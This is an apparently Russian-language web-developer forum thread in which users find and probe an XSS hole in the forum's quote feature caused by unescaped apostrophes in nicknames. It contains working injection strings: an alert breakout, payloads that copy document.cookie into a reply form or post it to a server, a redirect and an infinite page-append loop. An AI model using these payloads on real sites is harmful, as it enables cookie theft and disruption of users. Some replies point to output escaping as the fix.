Тест тест тест
 

Выдели текст и нажми "цитата выделенного"

Класс :)

xss, такой xss)

citeSelected(277714, ''+alert('ok')+'');return false

Это моя пакость ;)
Пытался процитировать товарища, у которого в никнейме апостров. Открыв консоль и увидев источник сыплющейся ошибки, решил удостовериться )

Мде, вот что бывает, когда люди не используют шаблонизаторы.

Сейчас все побегут искать дырки.
Наверное уже побежали:D

ы :write:

да уж

Идея хорошая, но мне кажется цитирование не так часто происходит, лучше повесить событие на кнопку "отправить быстрый ответ":)

Коротковато поле ника... из этого

'+document.getElementById('vB_Editor_QR_textarea').value = document.cookie; document.getElementById('qrform').submit +'

хватает только на '+document.getElementById

25
Блин мало*(
Кто-нибудь Илью предупредил то?:D

Код можно засунуть в подпись или в пост и заэвалить. Для выборки можно использовать jquery :-)

а толку?
все "интересные" куки давно http-only..

Я пробовал, не за что зацепиться, нужен элемент с id или класом не длиннее 2 символов, при этом, код запуститься только при клике на ник или цитировании. Так что, почти бесполезно, хотя если ещё подумать, то что-нибудь да придумается.

UPD Хотя идейка появилась:)

Всё равно как-то практически бесполезно, но если кто-то хорошенько подумает, что-нибудь да выйдет. Не хорошо это:)

alert("Fusce a metus eu diam varius congue nec nec sapien. Vestibulum orci tortor, sollicitudin ac euismod non, placerat ac augue. Nunc convallis accumsan justo. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Donec malesuada vehicula lectus, viverra sodales ipsum gravida nec. Integer gravida nisi ut magna mollis molestie. Nullam pharetra accumsan sagittis. Proin tristique rhoncus orci, eget vulputate nisi sollicitudin et. Quisque lacus augue, mollis non mollis et, ullamcorper in purus. Morbi et sem orci. Praesent accumsan odio in ante ullamcorper id pellentesque mauris rhoncus. Duis vitae neque dolor. Duis sed purus at eros bibendum cursus nec a nulla. Donec turpis quam, ultricies id pretium sit amet, gravida eget leo. Etiam aliquam sem ac velit feugiat elementum. Nunc eu elit velit, nec vestibulum nibh. Curabitur ultrices, diam non ullamcorper blandit, nunc lacus ornare nisi, egestas rutrum magna est id nunc. Pellentesque imperdiet malesuada quam, et rhoncus eros auctor eu. Nullam vehicula metus ac lacus rutrum nec fermentum urna congue. Vestibulum et risus at mi ultricies sagittis quis nec ligula. Suspendisse dignissim dignissim luctus. Duis ac dictum nibh. Etiam id massa magna. Morbi molestie posuere posuere. Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet. Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies. Duis tincidunt mi at quam condimentum lobortis.");

Ну если только так, но это палево:D

Хотя можно использовать, не однакратно:)

alert('Something');

http://javascript.ru/forum/offtopic/...na-sajjte.html )

:D

$.post('ololo.php', {test: document.cookie});

document.location = 'http://google.com';

while(true) $('body').append('ololo');

на клиенте

Достаточно запретить кавычки в Никах

Не важно где. Любой нормальный веб-шаблонизатор по дефолту проводит экранирование.